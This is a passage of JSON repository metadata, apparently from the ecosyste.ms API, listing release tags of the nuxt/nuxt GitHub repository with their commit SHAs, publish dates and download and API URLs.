16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"@nuxt/ui-templates@1.1.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1/manifests"},{"name":"@nuxt/ui@0.4.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"@nuxt/ui-templates@1.1.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0/manifests"},{"name":"@nuxt/ui-assets@0.2.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0/manifests"},{"name":"@nuxt/ui@0.4.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"@nuxt/ui-templates@0.4.0","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0/manifests"},{"name":"@nuxt/ui@0.3.3","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"@nuxt/ui-templates@0.3.3","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3/manifests"},{"name":"@nuxt/ui@0.3.2","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"@nuxt/ui-templates@0.3.2","sha":"dafb9ed0e436601b44a7dc8e6caa459314193ec7","kind":"tag","published_at":"2022-08-12T21:23:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"@nuxt/ui-templates@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1/manifests"},{"name":"@nuxt/ui@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"@nuxt/ui-templates@0.3.0","sha":"3623350feeb4b0ba4906611071430c7577440a75","kind":"tag","published_at":"2022-07-21T12:41:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0/manifests"},{"name":"@nuxt/ui-templates@0.2.2","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2/manifests"},{"name":"@nuxt/ui@0.3.0","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"@nuxt/ui-templates@0.2.1","sha":"1e0e83e29ac3633e299b9261c64122b360216200","kind":"tag","published_at":"2022-07-12T14:12:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1/manifests"},{"name":"@nuxt/ui-templates@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0/manifests"},{"name":"@nuxt/ui@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0